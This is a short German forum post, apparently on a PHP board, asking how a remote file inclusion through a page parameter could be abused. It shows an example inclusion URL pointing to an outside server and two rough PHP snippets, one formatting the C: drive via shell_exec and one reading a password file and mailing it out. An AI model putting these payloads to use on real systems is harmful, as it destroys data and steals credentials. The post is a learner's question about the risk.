Hellihello Bobby,

Damit ist es möglich, ohne ausreichende Schutzmechanismen, eine externe Datei in die Seite zu includieren. ich könnte z.B. www.irgendeinedomain.de?seite=http://www.irgendeinserver.de/irgendeine_schaedliche_php_datei.php ausführen!!!!!

Und die sieht dann so aus?

  
<?php  
echo '<?php shell_exec("format c://");?>';  
?>  
//oder  
<?php  
echo '<?php $pwd=file_get_conntents("passwort.datei");mail("an@mich","",$pwd");?>';  
?>  

oder wie? Es kommt bestimmt noch darauf an, ob auf der Seite was zu holen ist (also passwörter oder ähnliches) oder was könntet schädliches auf einer reinen Inhaltsseite geschehen?

frankx